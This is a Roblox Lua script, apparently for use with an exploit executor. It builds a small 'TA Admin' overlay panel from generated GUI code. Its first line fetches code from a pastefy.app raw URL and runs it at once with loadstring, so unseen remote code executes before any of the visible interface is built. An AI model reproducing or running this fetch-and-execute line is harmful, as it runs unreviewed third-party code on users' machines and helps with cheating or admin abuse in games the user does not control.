loadstring(game:HttpGet("https://pastefy.app/kCRrM6AI/raw"))()
local CollectionService = game:GetService("CollectionService");
local G2L = {};

G2L["ScreenGui_1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
G2L["ScreenGui_1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;

CollectionService:AddTag(G2L["ScreenGui_1"], [[main]]);

G2L["Frame_2"] = Instance.new("Frame", G2L["ScreenGui_1"]);
G2L["Frame_2"]["BorderSizePixel"] = 0;
G2L["Frame_2"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["Frame_2"]["Size"] = UDim2.new(0, 116, 0, 102);
G2L["Frame_2"]["Position"] = UDim2.new(0, 190, 0, -16);
G2L["Frame_2"]["BackgroundTransparency"] = 0.4;


-- Players.SpyTA666.PlayerGui.ScreenGui.Frame.UICorner
G2L["UICorner_3"] = Instance.new("UICorner", G2L["Frame_2"]);



G2L["Frame_4"] = Instance.new("Frame", G2L["Frame_2"]);
G2L["Frame_4"]["BorderSizePixel"] = 0;
G2L["Frame_4"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30);
G2L["Frame_4"]["Size"] = UDim2.new(0, 108, 0, 20);
G2L["Frame_4"]["Position"] = UDim2.new(0, 4, 0, 6);
G2L["Frame_4"]["BackgroundTransparency"] = 0.5;



G2L["UICorner_5"] = Instance.new("UICorner", G2L["Frame_4"]);



G2L["TextLabel_6"] = Instance.new("TextLabel", G2L["Frame_4"]);
G2L["TextLabel_6"]["TextWrapped"] = true;
G2L["TextLabel_6"]["BorderSizePixel"] = 0;
G2L["TextLabel_6"]["TextScaled"] = true;
G2L["TextLabel_6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["TextLabel_6"]["TextColor3"] = Color3.fromRGB(199, 199, 199);
G2L["TextLabel_6"]["BackgroundTransparency"] = 1;
G2L["TextLabel_6"]["Size"] = UDim2.new(0, 104, 0, 16);
G2L["TextLabel_6"]["Text"] = [[TA Admin]];
G2L["TextLabel_6"]["Position"] = UDim2.new(0, 2, 0, 2);


G2L["Frame_7"] = Instance.new("Frame", G2L["Frame_2"]);
G2L["Frame_7"]["BorderSizePixel"] = 0;
G2L["Frame_7"]["BackgroundColor3"] = Color3.fromRGB(30, 30, 30);
G2L["Frame_7"]["Size"] = UDim2.new(0, 106, 0, 66);
G2L["Frame_7"]["Position"] = UDim2.new(0, 4, 0, 30);
G2L["Frame_7"]["BackgroundTransparency"] = 0.5;


G2L["UICorner_8"] = Instance.new("UICorner", G2L["Frame_7"]);



G2L["UIStroke_9"] = Instance.new("UIStroke", G2L["Frame_2"]);




return G2L["ScreenGui_1"], require;
